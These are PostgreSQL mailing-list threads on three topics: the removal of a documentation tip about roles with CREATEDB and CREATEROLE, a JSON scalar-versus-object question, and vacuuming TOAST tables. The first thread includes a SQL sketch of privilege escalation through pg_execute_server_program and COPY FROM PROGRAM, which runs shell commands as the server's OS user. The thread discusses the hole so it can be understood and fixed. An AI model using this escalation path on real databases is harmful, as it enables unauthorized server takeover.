Re: What happened to the tip "It is good practice to create a role that has the CREATEDB and CREATEROLE privileges..."
On Wed, 2023-04-19 at 16:53 -0700, Bryn Llewellyn wrote:
> I do see that a role that has "createdb" and "createrole" is pretty powerful
> because, for example, a role with these attributes can use "set role" to
> become any other non-superuser (see the example below).

A user with CREATEROLE can make herself a member of "pg_execute_server_program",
which in turn allows a clever attacker on a normal installation to make herself
superuser.

Yours,
Laurenz Albe
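A minimal sketch of the escalation path described above, assuming PostgreSQL 15
or earlier with default settings; the role, database, and table names are
hypothetical:

    -- As superuser: a role created along the lines of the now-removed tip.
    CREATE ROLE helper LOGIN CREATEDB CREATEROLE PASSWORD 'secret';

    -- Connected as "helper" (not a superuser):
    GRANT pg_execute_server_program TO helper;  -- allowed, because helper has CREATEROLE
    CREATE DATABASE scratch;                    -- allowed, because helper has CREATEDB

    -- Connected as "helper" to database "scratch":
    CREATE TABLE cmd_output (line text);
    COPY cmd_output FROM PROGRAM 'id';          -- runs a shell command as the server's OS user

Once arbitrary commands run as the server's OS user, obtaining superuser is
straightforward, which is the point being made above.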
Re: What happened to the tip "It is good practice to create a role that has the CREATEDB and CREATEROLE privileges..."
laurenz.a...@cybertec.at wrote:
>> b...@yugabyte.com wrote:
>>
>> I do see that a role that has "createdb" and "createrole" is pretty powerful
>> because, for example, a role with these attributes can use "set role" to
>> become any other non-superuser (see the example below).
>
> A user with CREATEROLE can make herself a member of
> "pg_execute_server_program", which in turn allows a clever attacker on a
> normal installation to make herself superuser.

Yes, that's how the thread that Robert Haas started here begins:

https://www.postgresql.org/message-id/CA%2BTgmobGds7oefDjZUY%2Bk_J7p1sS%3DpTq3sZ060qdb%3DoKei1Dkw%40mail.gmail.com

It seems odd that this realization comes so late. And it seems odd to respond by
removing the tip in question rather than by extending it to explain that risk.
There's already a precedent for causing an error when a role with "createrole"
attempts to grant itself a role with "superuser". A naïve observer like me would
think that similar checks could be added to cause an error in these other
troublesome cases, so that the now-removed tip could really have the value that
whoever wrote it thought it already had. (I'm assuming that the hackers must
grant themselves special permission to change existing behavior to fix critical
security bugs.)
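For comparison, a minimal sketch of the existing safeguard mentioned above,
again assuming PostgreSQL 15 or earlier and hypothetical role names:

    -- As superuser:
    CREATE ROLE boss SUPERUSER;
    CREATE ROLE helper LOGIN CREATEDB CREATEROLE PASSWORD 'secret';

    -- Connected as "helper" (not a superuser):
    GRANT boss TO helper;                        -- rejected: only a superuser may change
                                                 -- membership of a superuser role
    GRANT pg_execute_server_program TO helper;   -- accepted, which is the gap discussed above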
missing something about json syntax
Hi,

PostgreSQL 15.

It looks like I am missing something, maybe obvious :-(

In a table with a json column (_data), if I ask psql to select _data from
mytable with a where clause to get only one line, I get something beginning
with:

{"time":"2023-04-19T16:28:01.19780551+02:00","stream":"stderr","_p":"F","log":"{\"level\":\"info\",\"ts\":\"2023-04-19T14:28:01Z\",\"logger\":\"_audit\",\"msg\":\"record\",\"logging_pod\":\"cluster-pgsql\",\"record\":{\"log_time\":\"2023-04-19 14:28:01.197 UTC\",\ etc...

If I create table anothertable as select _data as _data from mytable, it
creates and feeds that new table with all the appropriate data, and when I ask
psql \d anothertable it says that it's a table with a json column named _data.
Fine!

Now, if I select json_object_keys(_data) from mytable, I get a list of tags:
time, stream, _p, log. Fine. But if I select json_object_keys(_data) from
anothertable, I get an error: cannot call json_object_keys on a scalar.

???

Both columns are fed and of type json, and Postgres didn't throw any error
feeding them. If I create a table with a jsonb column and feed it from the
anothertable json column, it is the same: loading works fine... but the data is
still unusable. It is also unusable with all the other ways I tried, like simply

    select _data->'log'->>'level' from mytable, or
    select _data->'level' from anothertable

Sure, if I look at the json field, one is shown as { "tag": "value", ...
and the other is shown as "{\"tag\":\"value\", ... not the very same.

So, two questions:
1) How can Postgres feed a json or jsonb column and yet NOT be able to use the
   values in it?
2) How do I "transform" the inappropriate json into a usable one?

Of course, if what I am missing is very obvious, I apologize...

Marc MILLAS
Senior Architect
+33607850334
www.mokadb.com
Re: missing something about json syntax
> On 20/04/2023 18:35 CEST Marc Millas wrote:
>
> Hi,
>
> postgres 15
>
> looks like I am missing something, maybe obvious :-(
> In a table with a json column (_data), if I ask psql to select _data from
> mytable with a where clause to get only one line, I get something beginning
> with
> {"time":"2023-04-19T16:28:01.19780551+02:00","stream":"stderr","_p":"F","log":"{\"level\":\"info\",\"ts\":\"2023-04-19T14:28:01Z\",\"logger\":\"_audit\",\"msg\":\"record\",\"logging_pod\":\"cluster-pgsql\",\"record\":{\"log_time\":\"2023-04-19 14:28:01.197 UTC\",\
> etc...

The value of property "log" is a string, not an object.  Notice the escaped
double quotes (\").

> if I create table anothertable as select _data as _data from mytable, it
> creates and feeds that new table with all the appropriate data, and when I
> ask psql \d anothertable it says that it's a table with a json column named
> _data. fine !
>
> now if I select json_object_keys(_data) from mytable, I get a list of tags:
> time, stream, _p, log, fine.
> now, if I select json_object_keys(_data) from anothertable, I get an error:
> cannot call json_object_keys on a scalar.
>
> ???
> both columns are fed and of type json, and postgres didn't throw any error
> feeding them.
> if I create a table with a jsonb column and feed it with the anothertable
> json column, same, fine... but still unusable.
>
> and unusable with all the other ways I did try, like simply
> select _data->'log'->>'level' from mytable, or
> select _data->'level' from anothertable
>
> sure if I look at the json field one is shown { "tag": "value", ...
> and the other is shown "{\"tag\":\"value\", ...

You executed

	create table anothertable as select _data->'log' as _data from mytable;

and not

	create table anothertable as select _data as _data from mytable;

So you end up with the scalar value of property "log" in anothertable._data.

> not the very same
>
> so 2 questions:
> 1) how postgres can feed a json or jsonb column and CANNOT use the values in
>    it ??
> 2) how to "transform" the inappropriate json into a usable one ?
>
> of course, if what I am missing is very obvious, I apologize...

Get the log value with operator ->> and cast the returned text to json:

	select (_data->>'log')::json->'level' from mytable;

--
Erik
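A small illustration of why the extra cast is needed; the sketch reuses the
thread's column and table names:

	-- '->' keeps the value typed as json; '->>' returns it as text.  Because
	-- "log" holds a JSON string whose content is itself serialized JSON, it has
	-- to be unwrapped as text and re-parsed before its keys are reachable.
	select pg_typeof(_data->'log')  as as_json,   -- json (a scalar string)
	       pg_typeof(_data->>'log') as as_text    -- text
	from mytable limit 1;

	select (_data->>'log')::json->>'level' as level   -- 'info' in the sample row above
	from mytable limit 1;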
Re: missing something about json syntax
Thanks for your input.

select (_data->>'log')::json->'level' from mytable;

This does work. But it doesn't explain how Postgres is able to put a scalar in
a json or jsonb column without a problem. I don't understand how this
('"{\"t\"}"') can be considered valid enough json to be inserted in a json
column, and at the same time be invalid for all other json uses. It is as if
Postgres allowed inserting things that are not of the column's type. It's the
first time I have encountered this kind of behaviour from Postgres.

Marc MILLAS
Senior Architect
+33607850334
www.mokadb.com

On Thu, Apr 20, 2023 at 7:47 PM Erik Wienhold wrote:
> You executed
>
> 	create table anothertable as select _data->'log' as _data from mytable;
>
> and not
>
> 	create table anothertable as select _data as _data from mytable;
>
> Get the log value with operator ->> and cast the returned text to json:
>
> 	select (_data->>'log')::json->'level' from mytable;
Re: missing something about json syntax
Marc Millas writes:
> but it doesn't explain how postgres is able to put a scalar in a json or
> jsonb column without a problem:
> I don't understand how this ('"{\"t\"}"') can be considered a valid enough
> json to be inserted in a json column
> and at the same time invalid for all other json uses.

That's a bare string (it's not an object).  That's valid JSON per RFC 7159:

   JSON can represent four primitive types (strings, numbers, booleans,
   and null) and two structured types (objects and arrays).
   ...
   A JSON text is a serialized value.  Note that certain previous
   specifications of JSON constrained a JSON text to be an object or an
   array.

However, there certainly are some operations that require the top-level
value to be an object or array.

			regards, tom lane
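A minimal sketch of the distinction described above, using a throwaway literal:

	-- A bare string is a complete JSON value, so the json type accepts it...
	select '"hello"'::json;                      -- ok: a JSON scalar (string)

	-- ...but functions that need an object or array at the top level reject it:
	select json_object_keys('"hello"'::json);    -- ERROR: cannot call json_object_keys on a scalar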
vacuum TOAST tables
Hi All,

PostgreSQL v11.19-1PGDG.rhel7 (upgrading to 12+ is so far only talk)
CentOS 7.9

I see various recommendations for queries that return the tables most in need
of a vacuum while excluding the TOAST tables with something like:

    ... AND n.nspname NOT IN ('pg_toast')

My real issue is autovacuum not keeping up in spite of seeming to have the
resources to do so. My question at the moment is whether it is best to include
TOAST tables when scripting a manual vacuum of the oldest tables.

I'm currently querying for a list of the oldest X number of tables, feeding it
to 5-20 "threads", and monitoring resources. If a relation is in the pg_toast
namespace (which is all of them), I execute a VACUUM FREEZE on the main table,
repeating as necessary. All of them are TOAST, and they belong to sets of
tables that are created over a day and never updated afterwards. These tables
are months old. I've asked the developers to initiate vacuums, so at the moment
I'm more interested in understanding best practice for this scenario.

If I understand correctly, autovacuum handles tables and their associated TOAST
tables separately, but a manual vacuum will also vacuum the TOAST table. When
manually vacuuming, does it matter whether it's the main table or the TOAST
table?

I'm not where I have access right now, but this is close to what I'm using.
I've toggled between using LIMIT and relfrozenxid greater than X. I want to use
the least resource-intensive combination of query and vacuum.

    SELECT c.oid::regclass, age(c.relfrozenxid), o.relname, o.relnamespace
    FROM pg_class c
    LEFT JOIN pg_class o ON (c.relfilenode != 0 AND c.relfilenode = o.reltoastrelid)
    JOIN pg_namespace n ON c.relnamespace = n.oid
    WHERE c.relkind IN ('r', 't', 'p')
      AND n.nspname IN ('public', 'pg_toast')
      AND age(c.relfrozenxid) > ${max_age}
    ORDER BY 2 DESC

I've posted before about these same systems. They get to age(datfrozenxid) >
2,000,000,000 and can't keep up until I get it back down to under ~6. Then it
starts humming along as if I had "cleared" something.

I appreciate any advice.

Thanks,
Senor
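As in the query above, each pg_toast relation can be mapped back to its owning
table; a sketch of that lookup for a single TOAST table, with a placeholder
relation name:

    -- Resolve a TOAST table back to its owning table before issuing the manual
    -- VACUUM (FREEZE); 'pg_toast_16385' is a hypothetical name.
    SELECT t.oid::regclass      AS toast_table,
           c.oid::regclass      AS main_table,
           age(t.relfrozenxid)  AS toast_xid_age
    FROM pg_class t
    JOIN pg_class c ON c.reltoastrelid = t.oid
    WHERE t.relname = 'pg_toast_16385';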
Re: vacuum TOAST tables
On Fri, 2023-04-21 at 04:37, senor wrote:
> PostgreSQL v11.19-1PGDG.rhel7 (upgrading to 12+ is so far only talk)
> CentOS 7.9
>
> If I understand correctly, autovacuum handles tables and their associated
> TOAST tables separately, but a manual vacuum will also vacuum the TOAST table.

That is correct.

> When manually vacuuming, does it matter whether it's the main table or the
> TOAST table?

It makes a difference. As superuser you can directly VACUUM a TOAST table, and
that will not VACUUM the table it belongs to. However, if you VACUUM the main
table, both tables will be vacuumed, which is more work. So if you only need a
VACUUM on the TOAST table, doing that directly will be cheaper.

> I've posted before about these same systems. They get to age(datfrozenxid) >
> 2,000,000,000 and can't keep up until I get it back down to under ~6. Then it
> starts humming along as if I had "cleared" something.

That sounds unsavory. Did you set "autovacuum_freeze_max_age" to an extremely
high value?

Yours,
Laurenz Albe
--
Cybertec | https://www.cybertec-postgresql.com
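A minimal sketch of the two options described above; the TOAST relation and
table names are placeholders:

    -- As superuser: vacuum only the TOAST table (cheaper if that is all that needs it).
    VACUUM (FREEZE, VERBOSE) pg_toast.pg_toast_16385;

    -- Vacuuming the owning table processes it and its TOAST table (more work).
    VACUUM (FREEZE, VERBOSE) public.mytable;

    -- Relevant to the "not keeping up" question; the default is 200 million.
    SHOW autovacuum_freeze_max_age;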